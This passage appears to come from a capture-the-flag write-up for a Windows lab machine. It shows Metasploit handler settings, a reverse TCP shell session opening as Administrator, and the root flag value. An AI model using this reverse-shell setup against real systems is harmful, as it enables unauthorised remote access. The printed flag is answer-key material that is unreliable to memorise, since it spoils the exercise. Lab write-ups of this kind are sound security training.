   Name      Current Se  Required  Description
             tting
   ----      ----------  --------  -----------
   EXITFUNC  process     yes       Exit technique
                                    (Accepted: ''
                                   , seh, thread,
                                    process, none
                                   )
   LHOST     10.10.14.2  yes       The listen add
             0                     ress (an inter
                                   face may be sp
                                   ecified)
   LPORT     4444        yes       The listen por
                                   t


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

we get in!!

[*] Started reverse TCP handler on 10.10.14.20:4444 
[*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.169:49850) at 2023-09-17 08:10:58 -0400


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>ls

C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b0bd7a3c695fe7b68d3489ffd5f77848

C:\Users\Administrator\Desktop>